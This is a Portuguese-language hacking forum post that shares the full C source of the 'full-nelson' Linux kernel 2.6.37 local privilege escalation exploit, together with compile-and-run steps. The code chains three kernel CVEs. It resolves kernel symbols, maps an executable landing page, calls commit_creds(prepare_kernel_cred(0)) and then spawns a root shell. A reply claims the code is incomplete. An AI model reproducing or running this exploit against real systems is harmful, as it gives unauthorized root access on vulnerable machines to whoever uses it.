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[Exploit] Linux Kernel <= 2.6.37 local privilege escalation

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    Dica [Exploit] Linux Kernel <= 2.6.37 local privilege escalation

    Funciona no Kernel 2.6.37 e anteriores.

    Salva como full-nelson.c
    Só executa no linux:

    gcc full-nelson.c -o full-nelson
    ./full-nelson



    /*
    * Linux Kernel <= 2.6.37 local privilege escalation
    * by Dan Rosenberg
    * @djrbliss on twitter
    *
    * Usage:
    * gcc full-nelson.c -o full-nelson
    * ./full-nelson
    *
    * This exploit leverages three vulnerabilities to get root, all of which were
    * discovered by Nelson Elhage:
    *
    * CVE-2010-4258
    * -------------
    * This is the interesting one, and the reason I wrote this exploit. If a
    * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
    * word will be written to a user-specified pointer when that thread exits.
    * This write is done using put_user(), which ensures the provided destination
    * resides in valid userspace by invoking access_ok(). However, Nelson
    * discovered that when the kernel performs an address limit override via
    * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
    * etc.), this override is not reverted before calling put_user() in the exit
    * path, allowing a user to write a NULL word to an arbitrary kernel address.
    * Note that this issue requires an additional vulnerability to trigger.
    *
    * CVE-2010-3849
    * -------------
    * This is a NULL pointer dereference in the Econet protocol. By itself, it's
    * fairly benign as a local denial-of-service. It's a perfect candidate to
    * trigger the above issue, since it's reachable via sock_no_sendpage(), which
    * subsequently calls sendmsg under KERNEL_DS.
    *
    * CVE-2010-3850
    * -------------
    * I wouldn't be able to reach the NULL pointer dereference and trigger the
    * OOPS if users weren't able to assign Econet addresses to arbitrary
    * interfaces due to a missing capabilities check.
    *
    * In the interest of public safety, this exploit was specifically designed to
    * be limited:
    *
    * * The particular symbols I resolve are not exported on Slackware or Debian
    * * Red Hat does not support Econet by default
    * * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
    * Debian
    *
    * However, the important issue, CVE-2010-4258, affects everyone, and it would
    * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
    * more sophisticated version of this that doesn't have the roadblocks I put in
    * to prevent abuse by script kiddies.
    *
    * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
    *
    * NOTE: the exploit process will deadlock and stay in a zombie state after you
    * exit your root shell because the Econet thread OOPSes while holding the
    * Econet mutex. It wouldn't be too hard to fix this up, but I didn't bother.
    *
    * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
    */

    #include <stdio.h>
    #include <sys/socket.h>
    #include <fcntl.h>
    #include <sys/ioctl.h>
    #include <string.h>
    #include <net/if.h>
    #include <sched.h>
    #include <stdlib.h>
    #include <signal.h>
    #include <sys/utsname.h>
    #include <sys/mman.h>
    #include <unistd.h>

    /* How many bytes should we clear in our
    * function pointer to put it into userspace? */
    #ifdef __x86_64__
    #define SHIFT 24
    #define OFFSET 3
    #else
    #define SHIFT 8
    #define OFFSET 1
    #endif

    /* thanks spender... */
    unsigned long get_kernel_sym(char *name)
    {
    FILE *f;
    unsigned long addr;
    char dummy;
    char sname[512];
    struct utsname ver;
    int ret;
    int rep = 0;
    int oldstyle = 0;

    f = fopen("/proc/kallsyms", "r");
    if (f == NULL) {
    f = fopen("/proc/ksyms", "r");
    if (f == NULL)
    goto fallback;
    oldstyle = 1;
    }

    repeat:
    ret = 0;
    while(ret != EOF) {
    if (!oldstyle)
    ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
    else {
    ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
    if (ret == 2) {
    char *p;
    if (strstr(sname, "_O/") || strstr(sname, "_S."))
    continue;
    p = strrchr(sname, '_');
    if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
    p = p - 4;
    while (p > (char *)sname && *(p - 1) == '_')
    p--;
    *p = '\0';
    }
    }
    }
    if (ret == 0) {
    fscanf(f, "%s\n", sname);
    continue;
    }
    if (!strcmp(name, sname)) {
    fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
    fclose(f);
    return addr;
    }
    }

    fclose(f);
    if (rep)
    return 0;
    fallback:
    uname(&ver);
    if (strncmp(ver.release, "2.6", 3))
    oldstyle = 1;
    sprintf(sname, "/boot/System.map-%s", ver.release);
    f = fopen(sname, "r");
    if (f == NULL)
    return 0;
    rep = 1;
    goto repeat;
    }

    typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
    typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
    _commit_creds commit_creds;
    _prepare_kernel_cred prepare_kernel_cred;

    static int __attribute__((regparm(3)))
    getroot(void * file, void * vma)
    {

    commit_creds(prepare_kernel_cred(0));
    return -1;

    }

    /* Why do I do this? Because on x86-64, the address of
    * commit_creds and prepare_kernel_cred are loaded relative
    * to rip, which means I can't just copy the above payload
    * into my landing area. */
    void __attribute__((regparm(3)))
    trampoline()
    {

    #ifdef __x86_64__
    asm("mov $getroot, %rax; call *%rax;");
    #else
    asm("mov $getroot, %eax; call *%eax;");
    #endif

    }

    /* Triggers a NULL pointer dereference in econet_sendmsg
    * via sock_no_sendpage, so it's under KERNEL_DS */
    int trigger(int * fildes)
    {
    int ret;
    struct ifreq ifr;

    memset(&ifr, 0, sizeof(ifr));
    strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);

    ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);

    if(ret < 0) {
    printf("[*] Failed to set Econet address.\n");
    return -1;
    }

    splice(fildes[3], NULL, fildes[1], NULL, 128, 0);
    splice(fildes[0], NULL, fildes[2], NULL, 128, 0);

    /* Shouldn't get here... */
    exit(0);
    }

    int main(int argc, char * argv[])
    {
    unsigned long econet_ops, econet_ioctl, target, landing;
    int fildes[4], pid;
    void * newstack, * payload;

    /* Create file descriptors now so there are two
    references to them after cloning...otherwise
    the child will never return because it
    deadlocks when trying to unlock various
    mutexes after OOPSing */
    pipe(fildes);
    fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);
    fildes[3] = open("/dev/zero", O_RDONLY);

    if(fildes[0] < 0 || fildes[1] < 0 || fildes[2] < 0 || fildes[3] < 0) {
    printf("[*] Failed to open file descriptors.\n");
    return -1;
    }

    /* Resolve addresses of relevant symbols */
    printf("[*] Resolving kernel addresses...\n");
    econet_ioctl = get_kernel_sym("econet_ioctl");
    econet_ops = get_kernel_sym("econet_ops");
    commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
    prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");

    if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) {
    printf("[*] Failed to resolve kernel symbols.\n");
    return -1;
    }

    if(!(newstack = malloc(65536))) {
    printf("[*] Failed to allocate memory.\n");
    return -1;
    }

    printf("[*] Calculating target...\n");
    target = econet_ops + 10 * sizeof(void *) - OFFSET;

    /* Clear the higher bits */
    landing = econet_ioctl << SHIFT >> SHIFT;

    payload = mmap((void *)(landing & ~0xfff), 2 * 4096,
    PROT_READ | PROT_WRITE | PROT_EXEC,
    MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);

    if ((long)payload == -1) {
    printf("[*] Failed to mmap() at target address.\n");
    return -1;
    }

    memcpy((void *)landing, &trampoline, 1024);

    clone((int (*)(void *))trigger,
    (void *)((unsigned long)newstack + 65536),
    CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
    &fildes, NULL, NULL, target);

    sleep(1);

    printf("[*] Triggering payload...\n");
    ioctl(fildes[2], 0, NULL);

    if(getuid()) {
    printf("[*] Exploit failed to get root.\n");
    return -1;
    }

    printf("[*] Got root!\n");
    execl("/bin/sh", "/bin/sh", NULL);
    }
    Last edited by V3nom; 02-11-2011, 14:41.
    Pessoal, siga @sirbagda e fique sempre atualizado com materias, videos e afins do mundo hacker.

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    #2
    Hum bem legal, vale lembrar pros Kiddies de plantão que p código não está completo, portanto não irá funcionar a não ser que vc programe em C e corra atrás do que falta para funfar o exploit.
    Se eu conseguir posto aqui pra galera ;D
    flww

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